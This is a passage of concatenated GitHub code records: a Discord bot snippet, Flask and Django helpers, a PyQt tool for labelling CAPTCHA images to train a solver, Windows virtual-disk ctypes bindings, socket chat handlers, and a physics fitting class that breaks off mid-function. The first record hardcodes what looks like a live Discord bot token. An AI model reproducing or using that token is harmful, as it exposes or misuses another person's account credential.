çalıştır.\nbot.run(\"MTE3MDcyMjQwOTI0Mjk1MTgxMg.GaSf0x.OcM33sEBXjC65xUPicRy48Z65EQBOsF88SADsA\")\n\n","repo_name":"toprakefeeker/Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14805981861","text":"from flask_restful import fields\r\nfrom models.Usuario import usuario_campos\r\n\r\ngrupo_campos = {\r\n 'criador_id': fields.Integer(attribute=\"criador.id\"),\r\n 'dataCriacao': fields.DateTime,\r\n 'descricao': fields.String,\r\n 'participantes': fields.List(fields.Nested(usuario_campos))\r\n}\r\n\r\n'''\r\n Classe Grupo.\r\n'''\r\nclass Grupo():\r\n def __init__(self, criador, nome, dataCriacao, descricao):\r\n self.criador = criador\r\n self.nome = nome\r\n self.dataCriacao = dataCriacao\r\n self.descricao = descricao","repo_name":"RRFreitas/GeekWay","sub_path":"geekway-api/models/Grupo.py","file_name":"Grupo.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"70235007528","text":"import encodings\n\nfrom django import template\nfrom django.template.defaultfilters import stringfilter\n\nregister = template.Library()\n\n\n@stringfilter\ndef rtflinebreaks(value):\n \"Converts newlines into RTF \\\\lines\"\n return value.replace(\"\\n\", \"{\\\\line}\")\n\n\nregister.filter(rtflinebreaks)\n\nencoder = encodings.codecs.getencoder(\"1252\")\n\n\ndef unicode_to_rtf(u):\n \"\"\"Replaces all high characters with \\\\u escape sequences,\n assuming a Windows 1252 code page\"\"\"\n # We will assume Windows code page for now (for maxiumum\n # likelihood of compatibility -- RTF only seems to support\n # the first 65535 chars of unicode anyway).\n # The document should have these codes\n # \\ansi\\ansicpg1252\\uc1\n output = []\n for char in u:\n if ord(char) > 127:\n try:\n encoded = encoder(char)\n except UnicodeEncodeError:\n encoded = encoder(\"?\")\n val = ord(encoded[0])\n if val < 256:\n # use \\' method:\n converted = \"\\\\'\" + hex(val)[2:]\n else:\n # Don't even know if this works. The\n # '?' is the alternate rendering, one byte long,\n # to match the '\\uc1' directive\n converted = \"\\\\u%d ?\" % val\n else:\n converted = str(char)\n output.append(converted)\n return \"\".join(output)\n\n\n@stringfilter\ndef rtfescape(value):\n \"Escapes RTF control characters\"\n\n return unicode_to_rtf(value.replace(\"\\\\\", \"\\\\\\\\\").replace(\"{\", \"\\\\{\").replace(\"}\", \"\\\\}\"))\n\n\nregister.filter(rtfescape)\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/officers/templatetags/rtf.py","file_name":"rtf.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"22112460333","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom trainer_gui import Ui_MainWindow\nfrom jcaptcha_image import JCaptchaImage, JCaptchaCharacterImage\nimport os, sys\n\n\nclass MessageBox:\n\tdef showMessage_trainingComplete(form):\n\t\tmsg = QtWidgets.QMessageBox(form)\n\t\tmsg.setText('All training data collected and Model trained successfully!')\n\t\tmsg.setWindowTitle('Training complete!')\n\t\tmsg.setWindowIcon(QtGui.QIcon('icon/robot.ico'))\n\t\tmsg.exec_()\n\n\tdef showMessage_emptyTextBox(form):\n\t\tmsg = QtWidgets.QMessageBox(form)\n\t\tmsg.setText('Invalid input data!')\n\t\tmsg.setWindowTitle('Try again!')\n\t\tmsg.setWindowIcon(QtGui.QIcon('icon/robot.ico'))\n\t\tmsg.exec_()\n\n#-------------------------\n\n\nclass TrainerApp:\n\tdef __init__(self):\n\t\tself.images_filenames = os.listdir('Training Images')\n\t\tself.imageName_index = 0\n\t\tself.training_X_outputFile = open('Collected Training Data/training_X.csv', 'w')\n\t\tself.training_Y_outputFile = open('Collected Training Data/training_Y.csv', 'w')\n\t\t#------------------------------\n\t\tapp = QtWidgets.QApplication(sys.argv)\n\t\tself.MainWindow = QtWidgets.QMainWindow()\n\t\tself.UI = Ui_MainWindow()\n\t\tself.UI.setupUi(self.MainWindow, self)\n\t\t#\n\t\tself.__remainingCount = len(self.images_filenames)\n\t\tself.__failedCount = 0\n\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\t\tself.UI.failed_label.setText('Failed: 0')\n\t\t#\n\t\tself.MainWindow.show()\n\t\tsys.exit(app.exec_())\n\n\tdef storeTrainingData(self):\n\t\tif self.UI.answer_lineEdit.text() == '':\n\t\t\tMessageBox.showMessage_emptyTextBox(self.MainWindow)\n\t\t\treturn\n\t\tif self.imageName_index + 1 >= len(self.images_filenames):\n\t\t\tMessageBox.showMessage_trainingComplete(self.MainWindow)\n\t\t\tself.training_X_outputFile.close()\n\t\t\tself.training_Y_outputFile.close()\n\t\t\treturn\n\t\t#------------------------------\n\t\timg = JCaptchaImage('Training Images/' + self.images_filenames[self.imageName_index])\n\t\timg.treat()\n\t\timg.collect_character_imageList()\n\t\tjcaptcha_char_images = img.get_JCaptchaCharacterImage_List()\n\t\tanswer_text = self.UI.answer_lineEdit.text()\n\t\t#------------------------------\n\t\ttraining_X = ''\n\t\ttraining_Y = ''\n\t\t#---\n\t\tif len(jcaptcha_char_images) != len(answer_text):\n\t\t\topen('log.txt', 'a').write('Issue with ' + self.images_filenames[self.imageName_index] + '\\n')\n\t\t\tself.__failedCount += 1\n\t\t\tself.__remainingCount -= 1\n\t\t\tself.UI.failed_label.setText('Failed: ' + str(self.__failedCount))\n\t\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\t\telse:\n\t\t\tfor i in range(len(jcaptcha_char_images)):\n\t\t\t\ttraining_X += jcaptcha_char_images[i].get_CSV() + '\\n'\n\t\t\t\ttraining_Y += answer_text[i] + '\\n'\n\t\t\tself.training_X_outputFile.write(training_X)\n\t\t\tself.training_Y_outputFile.write(training_Y)\n\t\t#------------------------------\n\t\tself.imageName_index += 1\n\t\tself.UI.captchaBox.setPixmap(QtGui.QPixmap(\"Training Images/\" + self.images_filenames[self.imageName_index]))\n\t\tself.UI.answer_lineEdit.setText('')\n\t\t#\n\t\tself.__remainingCount -= 1\n\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\n\n#####\n#####\n#####\n\ndef main():\n\tif os.path.isfile('log.txt'):\n\t\tos.remove('log.txt')\n\ttrainer = TrainerApp()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"ali-sajjad-rizavi/JCaptcha-Solver","sub_path":"Training/trainer.pyw","file_name":"trainer.pyw","file_ext":"pyw","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"39795595010","text":"import ctypes\nfrom .wtypes import (\n BOOL,\n DWORD,\n GUID,\n LONG,\n POINTER,\n PVOID,\n PWSTR,\n ULARGE_INTEGER,\n ULONG,\n )\nfrom . import ref, fun_fact, raise_on_err\n\nfrom .kernel import KHANDLE, PKHANDLE\n\n_vdisk = ctypes.WinDLL(\"virtdisk.dll\")\n\n################################################################################\n\nATTACH_VIRTUAL_DISK_FLAG_NONE = 0\nATTACH_VIRTUAL_DISK_FLAG_READ_ONLY = 0x1\nATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER = 0x2\nATTACH_VIRTUAL_DISK_FLAG_PERMANENT_LIFETIME = 0x4\nATTACH_VIRTUAL_DISK_FLAG_NO_LOCAL_HOST = 0x8\nATTACH_VIRTUAL_DISK_FLAG_NO_SECURITY_DESCRIPTOR = 0x10\nATTACH_VIRTUAL_DISK_FLAG_BYPASS_DEFAULT_ENCRYPTION_POLICY = 0x20\nATTACH_VIRTUAL_DISK_FLAG_NON_PNP = 0x40\nATTACH_VIRTUAL_DISK_FLAG_RESTRICTED_RANGE = 0x80\nATTACH_VIRTUAL_DISK_FLAG_SINGLE_PARTITION = 0x100\nATTACH_VIRTUAL_DISK_FLAG_REGISTER_VOLUME = 0x200\n\nVIRTUAL_DISK_ACCESS_NONE = 0\nVIRTUAL_DISK_ACCESS_ATTACH_RO = 0x10000\nVIRTUAL_DISK_ACCESS_ATTACH_RW = 0x20000\nVIRTUAL_DISK_ACCESS_DETACH = 0x40000\nVIRTUAL_DISK_ACCESS_GET_INFO = 0x80000\nVIRTUAL_DISK_ACCESS_CREATE = 0x100000\nVIRTUAL_DISK_ACCESS_METAOPS = 0x200000\nVIRTUAL_DISK_ACCESS_READ = 0xd0000\nVIRTUAL_DISK_ACCESS_ALL = 0x3f0000\nVIRTUAL_DISK_ACCESS_WRITABLE = 0x320000\n\nOPEN_VIRTUAL_DISK_FLAG_NONE = 0\nOPEN_VIRTUAL_DISK_FLAG_NO_PARENTS = 0x1\nOPEN_VIRTUAL_DISK_FLAG_BLANK_FILE = 0x2\nOPEN_VIRTUAL_DISK_FLAG_BOOT_DRIVE = 0x4\nOPEN_VIRTUAL_DISK_FLAG_CACHED_IO = 0x8\nOPEN_VIRTUAL_DISK_FLAG_CUSTOM_DIFF_CHAIN = 0x10\nOPEN_VIRTUAL_DISK_FLAG_PARENT_CACHED_IO = 0x20\nOPEN_VIRTUAL_DISK_FLAG_VHDSET_FILE_ONLY = 0x40\nOPEN_VIRTUAL_DISK_FLAG_IGNORE_RELATIVE_PARENT_LOCATOR = 0x80\nOPEN_VIRTUAL_DISK_FLAG_NO_WRITE_HARDENING = 0x100\nOPEN_VIRTUAL_DISK_FLAG_SUPPORT_COMPRESSED_VOLUMES = 0x200\n\nOPEN_VIRTUAL_DISK_VERSION_UNSPECIFIED = 0\nOPEN_VIRTUAL_DISK_VERSION_1 = 1\nOPEN_VIRTUAL_DISK_VERSION_2 = 2\nOPEN_VIRTUAL_DISK_VERSION_3 = 3\n\nDETACH_VIRTUAL_DISK_FLAG_NONE = 0\n\nATTACH_VIRTUAL_DISK_VERSION_1 = 1\nATTACH_VIRTUAL_DISK_VERSION_2 = 2\n\n################################################################################\n\nclass VIRTUAL_STORAGE_TYPE(ctypes.Structure):\n _fields_ = (\n (\"DeviceId\", ULONG),\n (\"VendorId\", GUID),\n )\nPVIRTUAL_STORAGE_TYPE = POINTER(VIRTUAL_STORAGE_TYPE)\n\n################################################################################\n\nclass _OVDP_VERSION1(ctypes.Structure):\n _fields_ = (\n (\"RWDepth\", ULONG),\n )\n\nclass _OVDP_VERSION2(ctypes.Structure):\n _fields_ = (\n (\"GetInfoOnly\", BOOL),\n (\"ReadOnly\", BOOL),\n (\"ResiliencyGuid\", GUID),\n )\n\nclass _OVDP_VERSION3(ctypes.Structure):\n _fields_ = (\n (\"GetInfoOnly\", BOOL),\n (\"ReadOnly\", BOOL),\n (\"ResiliencyGuid\", GUID),\n (\"SnapshotId\", GUID),\n )\n\nclass _OVDP_UNION(ctypes.Union):\n _fields_ = (\n (\"Version1\", _OVDP_VERSION1),\n (\"Version2\", _OVDP_VERSION2),\n (\"Version3\", _OVDP_VERSION3),\n )\n\nclass OPEN_VIRTUAL_DISK_PARAMETERS(ctypes.Structure):\n _fields_ = ((\"Version\", LONG), (\"u\", _OVDP_UNION))\n _anonymous_ = (\"u\",)\nPOPEN_VIRTUAL_DISK_PARAMETERS = POINTER(OPEN_VIRTUAL_DISK_PARAMETERS)\n\n################################################################################\n\nclass _AVDP_VERSION1(ctypes.Structure):\n _fields_ = (\n (\"Reserved\", ULONG),\n )\n\nclass _AVDP_VERSION2(ctypes.Structure):\n _fields_ = (\n (\"RestrictedOffset\", ULARGE_INTEGER),\n (\"RestrictedLength\", ULARGE_INTEGER),\n )\n\nclass _AVDP_UNION(ctypes.Union):\n _fields_ = (\n (\"Version1\", _OVDP_VERSION1),\n (\"Version2\", _OVDP_VERSION2),\n )\n\nclass ATTACH_VIRTUAL_DISK_PARAMETERS(ctypes.Structure):\n _fields_ = ((\"Version\", LONG), (\"u\", _AVDP_UNION))\n _anonymous_ = (\"u\",)\nPATTACH_VIRTUAL_DISK_PARAMETERS = POINTER(ATTACH_VIRTUAL_DISK_PARAMETERS)\n\n################################################################################\n\n_OpenVirtualDisk = fun_fact(\n _vdisk.OpenVirtualDisk, (\n DWORD,\n PVIRTUAL_STORAGE_TYPE,\n PWSTR,\n LONG,\n LONG,\n POPEN_VIRTUAL_DISK_PARAMETERS,\n PKHANDLE\n )\n )\n\ndef OpenVirtualDisk(storage_type, path, access_mask, flags, parameters=None):\n hdl = KHANDLE()\n raise_on_err(\n _OpenVirtualDisk(\n ref(storage_type),\n path,\n access_mask,\n flags,\n None if parameters is None else ref(parameters),\n ref(hdl)\n )\n )\n return hdl\n\n################################################################################\n\n_AttachVirtualDisk = fun_fact(\n _vdisk.AttachVirtualDisk, (\n DWORD,\n KHANDLE,\n PVOID, # no interest in supplying a security descriptor\n LONG,\n ULONG,\n PATTACH_VIRTUAL_DISK_PARAMETERS,\n PVOID, # no interest in supplying an overlapped\n )\n )\n\ndef AttachVirtualDisk(hdl, flags, prov_flags=0, parameters=None):\n raise_on_err(\n _AttachVirtualDisk(\n hdl,\n None,\n flags,\n prov_flags,\n None if parameters is None else ref(parameters),\n None\n )\n )\n\n################################################################################\n\n_DetachVirtualDisk = fun_fact(\n _vdisk.DetachVirtualDisk, (\n DWORD,\n KHANDLE,\n LONG,\n ULONG,\n )\n )\n\ndef DetachVirtualDisk(hdl, flags=0, prov_flags=0):\n raise_on_err(_DetachVirtualDisk(hdl, flags, prov_flags))\n\n################################################################################\n","repo_name":"RoccoMatano/ctwin32","sub_path":"ctwin32/virtdisk.py","file_name":"virtdisk.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"40432995887","text":"from flask_socketio import SocketIO, emit, join_room, leave_room\nfrom flask_login import current_user\nfrom app.models import db, Chat\nimport os\n\nif os.environ.get(\"FLASK_ENV\") == \"production\":\n origins = [\"http://yillow-app.herokuapp.com\", \"https://yillow-app.herokuapp.com\"]\nelse:\n origins = \"*\"\n\nsocketio = SocketIO(cors_allowed_origins=origins)\n\n@socketio.on(\"join\")\ndef on_join(channel_id):\n join_room(channel_id)\n\n@socketio.on(\"leave\")\ndef on_leave(channel_id):\n leave_room(channel_id)\n\n@socketio.on(\"chat\")\ndef handle_chat(data):\n channel_id = data['channel_id']\n user_id = data['user_id']\n message = data[\"message\"]\n created_at = data[\"created_at\"]\n\n new_chat = Chat(channel_id=channel_id, user_id=user_id, message=message, created_at=created_at)\n db.session.add(new_chat)\n db.session.commit()\n\n\n emit(\"chat\", new_chat.to_dict(),\\\n to=str(channel_id),\n broadcast=True)\n\n@socketio.on(\"edit\")\ndef handle_edit(data):\n chat_id = data[\"id\"]\n message = data[\"message\"]\n\n chat = Chat.query.get(chat_id)\n chat.message = message\n\n db.session.commit()\n\n emit(\"edit\", chat.to_dict(), to=str(chat.channel_id), broadcast=True)\n\n@socketio.on(\"delete\")\ndef handle_delete(chat_id):\n chat = Chat.query.get(chat_id)\n channel_id = str(chat.channel_id)\n\n db.session.delete(chat)\n db.session.commit()\n\n data = {\"chat_id\": chat_id, \"channel_id\": int(channel_id)}\n\n emit(\"delete\", data, to=channel_id, broadcast=True)\n","repo_name":"frances-y-h/yillow","sub_path":"app/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"4662021490","text":"import csv\nimport json\nfrom shutil import rmtree\nfrom os import mkdir, path\n\n\ndef create_dir():\n mkdir('temp')\n\n\ndef remove_dir():\n rmtree('temp')\n\n\ndef csv_to_json(csv_file, json_file):\n arr = list()\n\n if path.exists(csv_file):\n with open(csv_file, encoding=\"utf8\") as f:\n reader = csv.DictReader(f)\n\n for line in reader:\n arr.append(line)\n\n with open(json_file, 'w', encoding=\"utf8\") as f:\n indent = len(arr[0])\n conv = json.dumps(arr, indent=indent, ensure_ascii=False)\n f.write(conv)\n else:\n return \"CSV file doesn't exist!\"\n\n\n# def json_to_csv(csv_file, json_file):\n#\n return\n","repo_name":"kreker783/CSV-JSON-Converter","sub_path":"code/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2135336772","text":"N = int(input())\npeople = []\nfor _ in range(N):\n people.append(list(map(int, input().split())))\nfor i in people:\n rank = 1\n for j in people:\n if j[0] > i[0] and j[1] > i[1]:\n rank += 1\n print(rank, end=' ')\n","repo_name":"WoosubLeee/algorithm-study","sub_path":"백준/Silver/7568/7568_덩치.py","file_name":"7568_덩치.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24938891747","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.arange(-3, 1, 0.1)\ny1 = np.exp(4 * x)\ny2 = 2 * np.cos(3 * x)\ny3 = x ** 2 + 4\nplt.plot(x, y1, color=\"red\", linestyle=\":\", label=\"$y=e^{4x}$\")\nplt.plot(x, y2, color=\"blue\", label=\"$y=2\\cos(3x)$\")\nplt.plot(x, y3, color=\"forestgreen\", linestyle=\"--\", label=\"$y=x^2+4$\")\nplt.xticks(np.arange(-3, 2))\nplt.yticks(np.arange(0, 40, 5))\nplt.title(\"Wykres trzech funkcji\")\nplt.grid()\nplt.legend(loc=2)\nplt.savefig(\"zad1.webp\")\nplt.show()\n","repo_name":"pjastr/wd2023_egz_rozw","sub_path":"F11/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37635874669","text":"import numpy as np\nimport torch\nfrom torch_geometric.utils import degree\nfrom torch_scatter import scatter_sum\n\nfrom data_utils import load_dimacs_cnf, load_dimacs_graph\nfrom const_language import Constraint_Language\n\n\nclass CSP_Data:\n \"\"\" Class to represent a binary CSP instance \"\"\"\n\n def __init__(self, num_vars, const_lang, edges, batch=None, path=None):\n \"\"\"\n :param num_vars: Size of the underlying domain\n :param const_lang: A Constraint_Language object that specifies the language of the instance\n :param edges: A dict of edge tensors. edges[rel] is a torch long tensor of shape 2 x m_{rel} where edges[rel]_i is the i-th edge of relation rel.\n :param batch: optional long tensor that indicates the instance in the batch which each variable belongs to.\n :path path: Optional string that holds the original path of an instance loaded from disc.\n \"\"\"\n self.num_vars = num_vars\n self.const_lang = const_lang\n self.edges = edges\n self.path = path\n\n self.batch = torch.zeros((num_vars,), dtype=torch.int64) if batch is None else batch\n self.batch_size = self.batch.max() + 1\n\n self.device = 'cpu'\n\n # degree and inverse degree needed for mean pooling\n self.var_deg = degree(torch.cat([e.reshape(-1) for e in edges.values()]), dtype=torch.float32, num_nodes=self.num_vars)\n self.var_reg = 1.0 / (self.var_deg + 1.0e-6).view(-1, 1)\n\n def to(self, device):\n # move data to given device\n self.device = device\n self.var_deg = self.var_deg.to(device)\n self.var_reg = self.var_reg.to(device)\n self.batch = self.batch.to(device)\n\n self.const_lang.to(device)\n\n for k in self.edges.keys():\n self.edges[k] = self.edges[k].to(device)\n\n @staticmethod\n def collate(data_list):\n # merge instances into one batch\n\n num_vars = sum([d.num_vars for d in data_list])\n const_lang = data_list[0].const_lang\n path = data_list[0].path\n batch = torch.cat([d.batch + i for i, d in enumerate(data_list)])\n\n # combine edges and shift variables to batch offset\n var_offset = 0\n edges = {rel: [] for rel in const_lang.relations.keys()}\n for data in data_list:\n for rel, edge_idx in data.edges.items():\n edges[rel].append(edge_idx + var_offset)\n var_offset += data.num_vars\n\n edges = {rel: torch.cat(edge_idx, dim=1) for rel, edge_idx in edges.items() if len(edge_idx) > 0}\n\n # create merged instance\n data = CSP_Data(num_vars, const_lang, edges, batch, path)\n return data\n\n def hard_assign(self, soft_assignment):\n # assign value with larges prob to each variable\n return torch.argmax(soft_assignment, dim=-1)\n\n def constraint_sat_prob(self, soft_assignment):\n \"\"\"\n :param soft_assignment: a soft variable assignment\n :return sat_prob: dictionary where sat_prob[rel] is a torch float tensor such that sat_prob[rel]_{i,t}. is the prob of edge i being satisfied in time step t.\n \"\"\"\n\n soft_assignment = soft_assignment.view(self.num_vars, -1, self.const_lang.domain_size)\n sat_prob = {}\n for rel, edge_idx in self.edges.items():\n # characteristic matrix\n R = self.const_lang.char_matrices[rel]\n\n # get soft assignments at each edge\n p1 = soft_assignment[edge_idx[0]]\n p2 = soft_assignment[edge_idx[1]]\n\n # compute probability\n sat_prob[rel] = (torch.matmul(p1, R) * p2).sum(dim=2)\n\n return sat_prob\n\n def count_unsat(self, soft_assignment):\n \"\"\"\n :param soft_assignment: a soft variable assignment\n :return num_unsat: tensor such that num_unsat_{i,t} is the number of unsatisfied constraints on instance i in time step t.\n \"\"\"\n hard_assignment = self.hard_assign(soft_assignment)\n num_unsat = torch.zeros((self.batch_size, hard_assignment.shape[1]), dtype=torch.int64, device=self.device)\n for rel, edge_idx in self.edges.items():\n R = self.const_lang.char_matrices[rel]\n v1 = hard_assignment[edge_idx[0]]\n v2 = hard_assignment[edge_idx[1]]\n edge_unsat = (1.0 - R[v1, v2]).long()\n num_unsat += scatter_sum(edge_unsat, self.batch[edge_idx[0]], dim=0)\n return num_unsat\n\n @staticmethod\n def load_2cnf(path):\n # load 2sat formula from disc\n\n const_lang = Constraint_Language.get_2sat_language()\n cnf = load_dimacs_cnf(path)\n cnf = [np.int64(c) for c in cnf]\n num_var = np.max([np.abs(c).max() for c in cnf])\n\n def clause_type(clause):\n # returns the relation type for a given clause\n if clause[0] * clause[1] < 0:\n return 'IMPL'\n elif clause[0] > 0:\n return 'OR'\n else:\n return 'NAND'\n\n # fill unit clauses\n cnf = [[c[0], c[0]] if len(c) == 1 else c for c in cnf]\n\n # normalize implication clauses\n cnf = [[c[1], c[0]] if clause_type(c) == 'IMPL' and c[0] > 0 else c if len(c) == 1 else c for c in cnf]\n\n edges = {rel: [] for rel in {'OR', 'IMPL', 'NAND'}}\n for i, c in enumerate(cnf):\n u = abs(c[0]) - 1\n v = abs(c[1]) - 1\n rel = clause_type(c)\n edges[rel].append([u, v])\n\n edges = {rel: torch.tensor(e).transpose(0, 1) for rel, e in edges.items() if len(e) > 0}\n data = CSP_Data(num_vars=num_var, const_lang=const_lang, edges=edges, path=path)\n return data\n\n @staticmethod\n def load_graph_maxcol(path, num_colors):\n # load graph from disc and create coloring instance\n\n nx_graph = load_dimacs_graph(path)\n const_lang = Constraint_Language.get_coloring_language(num_colors)\n\n num_vert = nx_graph.order()\n idx_map = {v: i for i, v in enumerate(nx_graph.nodes())}\n\n edge_idx = torch.tensor([[idx_map[u], idx_map[v]] for u, v in nx_graph.edges()])\n edge_idx = edge_idx.transpose(0, 1)\n edges = {'NEQ': edge_idx}\n\n data = CSP_Data(num_vars=num_vert, const_lang=const_lang, edges=edges, path=path)\n return data\n\n @staticmethod\n def load_graph_maxcut(path):\n # load graph from disc and create weighted maxcut instance\n nx_graph = load_dimacs_graph(path)\n const_lang = Constraint_Language.get_maxcut_language()\n\n num_vert = nx_graph.order()\n idx_map = {v: i for i, v in enumerate(nx_graph.nodes())}\n\n edges = {'EQ': [], 'NEQ': []}\n for u, v, w in nx_graph.edges(data='weight'):\n rel = 'NEQ' if w > 0 else 'EQ'\n edges[rel].append([idx_map[u], idx_map[v]])\n\n edges = {rel: torch.tensor(e).transpose(0, 1) for rel, e in edges.items() if len(e) > 0}\n\n data = CSP_Data(num_vars=num_vert, const_lang=const_lang, edges=edges, path=path)\n return data\n","repo_name":"toenshoff/RUNCSP-PyTorch","sub_path":"csp_data.py","file_name":"csp_data.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35355472897","text":"import functools\nimport logging\n\nimport gvar as gv\nimport lsqfit as lsq\nimport natpy as nat\nimport numpy as np\n\nfrom utilities import jackknives, structure, particles, configIDs\n\n\nJackknifeEnsemble = jackknives.JackknifeEnsemble\nStructure = structure.Structure\n\n\nlogger = logging.getLogger(__name__)\nlogging.Formatter(fmt=\"%(name)s(%(lineno)d)::%(levelname)-8s: %(message)s\")\n\n\nclass Fit_1d:\n def __init__(\n self,\n fcn: callable,\n nparams: int,\n x: np.ndarray,\n y,\n y_err: np.ndarray = None,\n jackknives: list[JackknifeEnsemble] = None,\n initial_guess: list[float] = None,\n calculate_naive_chi_sq: bool = False,\n fit_jackknives: bool = False,\n ):\n self.fcn = fcn\n self.nparams = nparams\n self.x = x\n if isinstance(y[0], gv.GVar):\n if y_err is not None:\n logging.warning(\n \"y is array of gvar variables so passed y_err will be ignored.\"\n )\n if jackknives is not None and not fit_jackknives:\n logger.warning(\n \"Jackknives were supplied. Passing y as collection of gvar variables with fit_jackknives = False will result in the jackknives being ignored and the existing covariance between the gvars to be used instead.\"\n )\n elif jackknives is not None:\n logger.warning(\n \"Using existing correlation between the y data from gvars. Jackknives will only be used for the fit on a jackknife level.\"\n )\n\n # In case gvar were passed as a list\n self.y = gv.gvar(y)\n\n elif isinstance(y[0], (float, np.floating)):\n if y_err is jackknives is None:\n raise ValueError(\n \"y is array of floats so either y_err or jackknives must be non-None.\"\n )\n if y_err is None:\n logger.info(\n \"Setting uncertainties using covariance matrix from jackknives.\"\n )\n self.covariance_matrix = covariance_matrix(jackknives)\n self.y = gv.gvar(y, self.covariance_matrix)\n elif jackknives is None:\n self.y = gv.gvar(y, y_err)\n else:\n raise ValueError(\"y must be array of gvars or floats.\")\n\n if initial_guess is None:\n logger.info(\"Taking initial guess to be zero for all fit parameters.\")\n self.initial_guess = [0] * self.nparams\n else:\n self.initial_guess = initial_guess\n\n self.calculate_naive_chi_sq = calculate_naive_chi_sq\n if fit_jackknives and jackknives is None:\n raise ValueError(\"Jackknives must not be None to be fit\")\n self.jackknives = jackknives\n self.fit_jackknives = fit_jackknives\n\n def do_fit(self):\n self.average_fit = lsq.nonlinear_fit(\n data=(self.x, self.y), fcn=self.fcn, p0=self.initial_guess\n )\n\n if self.calculate_naive_chi_sq:\n diagonal_covariance_mat = gv.evalcov(self.y) * np.eye(self.y.size)\n self.uncorrelated_y = gv.gvar(gv.mean(self.y), diagonal_covariance_mat)\n self.naive_fit = lsq.nonlinear_fit(\n data=(self.x, self.y), fcn=self.fcn, p0=[gv.mean(self.average_fit.p)]\n )\n\n if self.fit_jackknives:\n self.jackknife_fits = []\n ncon = self.jackknives[0].ncon\n self.jackknife_fits_values = np.zeros(ncon)\n for icon in range(ncon):\n y_data = [\n jackknife_ensemble.jackknives[icon]\n for jackknife_ensemble in self.jackknives\n ]\n y_err = [\n jackknife_ensemble.uncertainties[icon]\n for jackknife_ensemble in self.jackknives\n ]\n \n self.jackknife_fits.append(\n lsq.nonlinear_fit(\n data=(self.x, y_data, y_err),\n fcn=self.fcn,\n p0=gv.mean(self.average_fit.p),\n )\n )\n self.jackknife_fits_values[icon] = self.jackknife_fits[icon].pmean\n self.jackknife_fits_values = JackknifeEnsemble(self.jackknife_fits_values)\n\ndef covariance_matrix(jackknife_ensembles: list[JackknifeEnsemble]) -> np.ndarray:\n ensemble_averages = np.asarray(\n [ensemble.ensemble_average for ensemble in jackknife_ensembles]\n )\n product_of_average = ensemble_averages[:, None] * ensemble_averages[:, None].T\n jackknives = np.asarray([ensemble.jackknives for ensemble in jackknife_ensembles])\n ncon = jackknives.shape[1]\n average_of_product = np.matmul(jackknives, jackknives.T) / ncon\n return (ncon - 1) * (average_of_product - product_of_average)\n\n\nclass PolarisabilityFit(Fit_1d):\n def __init__(\n self,\n particle: str,\n structure: Structure,\n ensemble: configIDs.PACSEnsemble,\n mass: gv.GVar,\n energy_shift: np.ndarray,\n mass_jackknives: JackknifeEnsemble = None,\n energy_shift_jackknives: list[JackknifeEnsemble] = None,\n initial_guess: float = 0,\n calculate_naive_chi_sq: bool = True,\n fit_jackknives: bool = False,\n ):\n self.particle = particle\n self.structure = structure\n self.ensemble = ensemble\n self.mass = mass\n self.energy_shift = energy_shift\n self.num_kd = energy_shift.size\n\n x = np.arange(1, self.num_kd + 1)\n\n self.landau_term = self.calculate_landau(\n mass, particle, structure, spacing=ensemble.a\n )\n y = energy_shift - self.landau_term * x\n \n if fit_jackknives and None not in (mass_jackknives, energy_shift_jackknives):\n self.mass_jackknives = mass_jackknives\n self.energy_shift_jackknives = energy_shift_jackknives\n self.landau_jackknives = self.calculate_landau(\n self.mass_jackknives.jackknives, particle, structure, spacing=ensemble.a\n )\n jackknives = [JackknifeEnsemble(self.energy_shift_jackknives[i].jackknives - self.landau_jackknives * x[i]) for i in range(self.num_kd)]\n \n else:\n jackknives = None\n\n super().__init__(\n fcn=self._quadfit,\n nparams=1,\n x=x,\n y=y,\n jackknives=jackknives,\n initial_guess=[initial_guess],\n calculate_naive_chi_sq=calculate_naive_chi_sq,\n fit_jackknives=fit_jackknives,\n )\n\n @staticmethod\n def convert_fit(fit_value: gv.GVar | np.ndarray, spacing: float, Nx = 32, Ny = 32):\n HBARC = 0.1973269718 # GeV fm\n q_d = -1/3\n return (\n -2\n * fit_value\n * nat.constants.alpha.value\n * (-1 / 3) ** 2\n * (spacing**4 * (Nx * Ny / 2 / np.pi) ** 2 / HBARC)\n )\n\n @staticmethod\n def _quadfit(x, a0):\n return x**2 * a0\n\n @staticmethod\n def calculate_landau(\n mass: float | np.ndarray, particle: str, structure: Structure, spacing: float\n ) -> float | np.ndarray:\n \n particle_charge = particles.get_particle_charge(particle, structure)\n q_d = -1 / 3\n Nx = Ny = 32\n HBARC = 0.1973269718 # 